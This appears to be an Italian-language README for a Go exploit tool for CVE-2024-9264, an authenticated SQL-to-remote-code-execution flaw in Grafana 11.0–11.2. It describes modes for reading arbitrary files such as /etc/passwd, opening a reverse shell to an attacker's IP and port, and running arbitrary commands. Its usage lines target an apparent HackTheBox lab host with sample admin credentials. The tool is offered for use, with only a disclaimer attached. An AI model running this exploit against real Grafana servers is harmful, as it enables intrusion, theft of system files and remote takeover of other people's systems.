
Un'implementazione in Go per CVE-2024-9264 che colpisce le versioni di Grafana 11.0.x, 11.1.x e 11.2.x.
Strumento di exploit per CVE-2024-9264, una vulnerabilità critica in Grafana che consente a un utente autenticato di eseguire una query SQL che porta a RCE
🛡️ Questo strumento è strettamente per scopi educativi e test di penetrazione autorizzati.
L'uso non autorizzato è illegale e non etico.
CVE-2024-9264 è una falla critica in Grafana che consente a un utente autenticato di eseguire comandi SQL, portando a RCE e lettura di file.
file – Legge file arbitrari (es. /etc/passwd)shell – Reverse shell verso la macchina dell'attaccantecommand – Esegue comandi shell arbitrari (es. whoami)
Non tutti gli argomenti sono necessari.
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]